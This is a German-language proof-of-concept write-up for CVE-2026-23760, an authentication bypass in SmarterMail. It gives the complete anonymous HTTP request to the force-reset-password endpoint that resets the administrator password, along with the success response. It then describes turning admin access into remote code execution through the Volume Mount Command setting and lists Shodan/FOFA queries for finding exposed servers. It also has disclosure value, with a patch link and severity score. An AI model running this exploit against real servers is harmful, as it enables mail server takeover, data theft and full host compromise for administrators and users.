
CVE-2026-23760 – Eine Authentifizierungsumgehung über die Passwort-Reset-API in SmarterMail.
Ein Proof-of-Concept, das eine Authentifizierungsumgehung über die Passwort-Reset-API für das Systemadministrator-Konto von SmarterMail ausnutzt.
Die Schwachstelle besteht aufgrund einer Authentifizierungsumgehung in der Passwort-Reset-API. Der Endpunkt force-reset-password erlaubt anonyme Anfragen und versäumt es, das bestehende Passwort oder ein Reset-Token bei der Zurücksetzung von Systemadministrator-Konten zu verifizieren.
Der PoC ist so einfach wie folgt:
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
Sie sollten die folgende Antwort erhalten, die bestätigt, dass das Passwort erfolgreich geändert wurde:
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
Die einzige verbleibende Anforderung ist die Kenntnis des Benutzernamens des Administratorkontos.
Sobald ein Angreifer als Systemadministrator authentifiziert ist, kann er:
Einstellungen -> Volume-Mounts navigieren.Volume Mount Command angeben.Dieser Befehl wird vom zugrunde liegenden Betriebssystem ausgeführt. An diesem Punkt hat der Angreifer eine vollständige Remote-Codeausführung auf dem Host erreicht.
Wenn die Konfiguration gespeichert wird, wird der angegebene Befehl sofort ausgeführt.
Nuclei-Template:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml
FOFA:
title='SmarterMail'
SHODAN:
html:'SmarterMail'
Ein nicht authentifizierter Remote-Angreifer kann die Authentifizierung für das Systemadministrator-Konto umgehen und Zugriff erlangen. Nach der Authentifizierung kann er eine vollständige Remote-Codeausführung auf dem Host durchführen.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Kritisch
Auf die neueste Version aktualisieren: https://www.smartertools.com/smartermail/downloads
Dieses Tool ist nur für autorisierte Sicherheitstests bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal.